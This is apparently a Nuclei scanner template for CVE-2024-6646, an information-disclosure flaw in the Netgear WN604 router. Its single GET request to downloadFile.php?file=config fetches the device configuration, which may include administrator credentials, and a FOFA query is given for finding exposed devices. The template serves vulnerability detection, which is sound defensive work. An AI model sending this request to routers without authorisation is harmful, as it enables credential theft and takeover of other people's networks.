nuclei-templates/http/cves/2024/CVE-2024-6646.yaml

52 lines
1.9 KiB
YAML

id: CVE-2024-6646
info:
name: Netgear-WN604 downloadFile.php - Information Disclosure
author: pussycat0x
severity: medium
description: |
There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.
reference:
- https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
- https://github.com/mikutool/vul/issues/1
- https://vuldb.com/?ctiid.271052
- https://vuldb.com/?id.271052
- https://vuldb.com/?submit.367382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-6646
cwe-id: CWE-200
epss-score: 0.00045
epss-percentile: 0.16001
cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:*
metadata:
fofa-query: title=="Netgear"
product: wn604
vendor: netgear
tags: cve,cve2024,netgear
http:
- method: GET
path:
- "{{BaseURL}}/downloadFile.php?file=config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "system:basicSettings"
- "system:staSettings"
condition: and
- type: word
part: content_type
words:
- "application/force-download"
- type: status
status:
- 200
# digest: 490a00463044022061dfd0175001443072f737684368faff9a2516c4009eff8165c3b03ce91ebc40022071c9cea2bee7a01701b51c5a707e033d359a8c8740a9340a62ac452c709bff82:922c64590222798bb761d5b6d8e72950